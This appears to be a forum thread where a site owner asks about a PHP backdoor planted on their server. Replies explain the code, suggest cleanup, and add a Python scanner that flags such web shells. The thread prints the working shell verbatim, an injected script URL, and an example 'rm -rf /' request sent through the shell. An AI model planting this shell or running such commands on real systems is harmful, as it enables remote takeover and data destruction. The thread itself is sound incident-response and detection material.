I recently found 4 strange files on my small server (which I did not upload). The filenames were like this: goog1e7a20543b128921.php

And here's the code they contained:

Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>

Do you have any idea what this code is supposed to do? Should I start to worry?

Thanks.

eval($e) - remote code execution; system - e.g. for listing a directory; $_FILES['f']['name'] - for uploading scripts to the server, e.g. hack tools etc.

Apparently you aren't the only one with one of these. I researched it quickly, and other sites appear to be infected too. It seems the infected file always stores itself in the images folder.

Related: try installing phpAntiVirus for the future, and ask your provider for mod_security. This may mitigate future hacks. Those files did not materialize by themselves on your server anyway. Remove all old PHP programs.

Search for this in every file: script src="http://nt02.co.in/3"> If you find one, use your FTP client to check the date the file was modified, open all of the files modified on that date, and remove it.

badbo Monster Killer

For reference:

if($e){eval($e);}

This allows the attacker to execute any PHP code they want.

if($s){system($s);}

This allows the attacker to execute any system command they want, as whatever user your webserver runs as.

if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}

This allows the attacker to upload any file they want - again, the user your webserver runs as determines the file permissions.

To sum up: worry :-p

I am sure you will find plenty of articles online on how to deal with this. Briefly: back up the box for analysis later, re-install the server yourself (you do not know what else they've done to you, so just removing the files is not adequate), and work out how they got in and plug the hole.
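The answer above explains the three pieces of the shell (request data into eval(), into system(), and into move_uploaded_file()), and an earlier reply suggests checking which other files were modified on the same day as the infected one. The following scanner is an added example, not code from any poster in this thread: it flags PHP files where a request superglobal appears together with one of those sinks, flags the "goog1e" filename from the question, and then lists every file under the web root modified on the same dates as the hits. The indicator names, the sample files in demo(), and their timestamps are constructed for the example.

```python
"""Triage scanner for PHP web shells like the one posted in the question.

A file is reported when its source references request data ($_POST/$_GET/
$_REQUEST/$_COOKIE) *and* calls eval(), a command-execution function or
move_uploaded_file(); either half alone is common in clean code. The sample
files written by demo() are constructed for this example.
"""
import os
import re
import tempfile
from datetime import datetime, timezone

# Indicator regexes (names are local to this example).
INDICATORS = {
    "request-input": re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.I),
    "eval": re.compile(r"\beval\s*\(", re.I),
    "exec": re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I),
    "upload": re.compile(r"\bmove_uploaded_file\s*\(", re.I),
}
SINKS = ("eval", "exec", "upload")
# Filename IOC taken from the question: "google" with a digit one.
LOOKALIKE_NAME = re.compile(r"goog1e", re.I)

# The shell posted in the question, kept verbatim as a positive sample.
SAMPLE_SHELL = (
    "Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}"
    "if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file("
    "$_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>"
)
# Constructed benign files: request input with no sink, and a sink with no request input.
SAMPLE_CONTACT = "<?php $name = $_POST['name'] ?? ''; echo htmlspecialchars($name); ?>"
SAMPLE_CRON = "<?php system('ls -l /var/log'); ?>"


def scan_source(src):
    """Return the set of indicator names present in one PHP source string."""
    return {name for name, rx in INDICATORS.items() if rx.search(src)}


def is_shell(hits):
    """Request-controlled input reaching an execution or upload sink."""
    return "request-input" in hits and any(s in hits for s in SINKS)


def _mtime_date(path):
    return datetime.fromtimestamp(os.path.getmtime(path), timezone.utc).date()


def scan_tree(root):
    """Walk root; return [(path, sorted hits, mtime date)] for suspicious PHP files."""
    found = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                hits = scan_source(fh.read().decode("utf-8", "replace"))
            if LOOKALIKE_NAME.search(fn):
                hits.add("lookalike-name")
            if is_shell(hits) or "lookalike-name" in hits:
                found.append((path, sorted(hits), _mtime_date(path)))
    return found


def files_modified_on(root, dates):
    """Every file under root (any type) whose mtime falls on one of `dates`."""
    return sorted(
        os.path.join(d, f)
        for d, _, fs in os.walk(root)
        for f in fs
        if _mtime_date(os.path.join(d, f)) in dates
    )


def demo():
    """Build a constructed web root in a temp dir and run both passes."""
    day1 = datetime(2010, 3, 14, 12, 0, tzinfo=timezone.utc).timestamp()
    day2 = datetime(2010, 3, 20, 12, 0, tzinfo=timezone.utc).timestamp()
    root = tempfile.mkdtemp(prefix="webroot-")
    samples = {
        "images/goog1e7a20543b128921.php": (SAMPLE_SHELL, day1),
        "images/footer.js": ("document.write('');", day1),  # touched the same day
        "contact.php": (SAMPLE_CONTACT, day2),
        "cron/report.php": (SAMPLE_CRON, day2),
    }
    for rel, (body, ts) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        os.utime(path, (ts, ts))
    shells = scan_tree(root)
    same_day = files_modified_on(root, {d for _, _, d in shells})
    return {
        "shells": sorted(os.path.relpath(p, root) for p, _, _ in shells),
        "hits": {os.path.relpath(p, root): h for p, h, _ in shells},
        "same_day": [os.path.relpath(p, root) for p in same_day],
    }


if __name__ == "__main__":
    import pprint
    pprint.pprint(demo())
```

The same-day list is deliberately not limited to PHP: the earlier reply's advice is to open everything touched on that date, since the attacker may also have edited images, JavaScript or templates. Treat the scanner as a triage aid, not proof of cleanliness; an obfuscated shell (base64, string concatenation) will not match these literal patterns, which is one reason the answer above recommends rebuilding rather than just deleting the files.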

Remove them right NOW!

It is a backdoor to your webserver.
It allows attackers to send a request to http://you.com/goog1e7a20543b128921.php?s=rm -rf / to delete your whole system.

Next, conduct a thorough security review of your website to determine how they got in in the first place.

Yep, this really is malicious code. This shell script allows executing code as well as uploading any file, provided the attacker knows the parameters passed into it. I suggest searching all files for this code, verifying file permissions and changing your passwords just in case.

Suggestions to handle the attack

I recommend you use HTML Purifier or the OWASP tools to make things a lot more secure.

You should disable the eval construct if you're not using it (and you shouldn't unless you really need to).

Check the server configuration for any security holes with:

PHPSecInfo
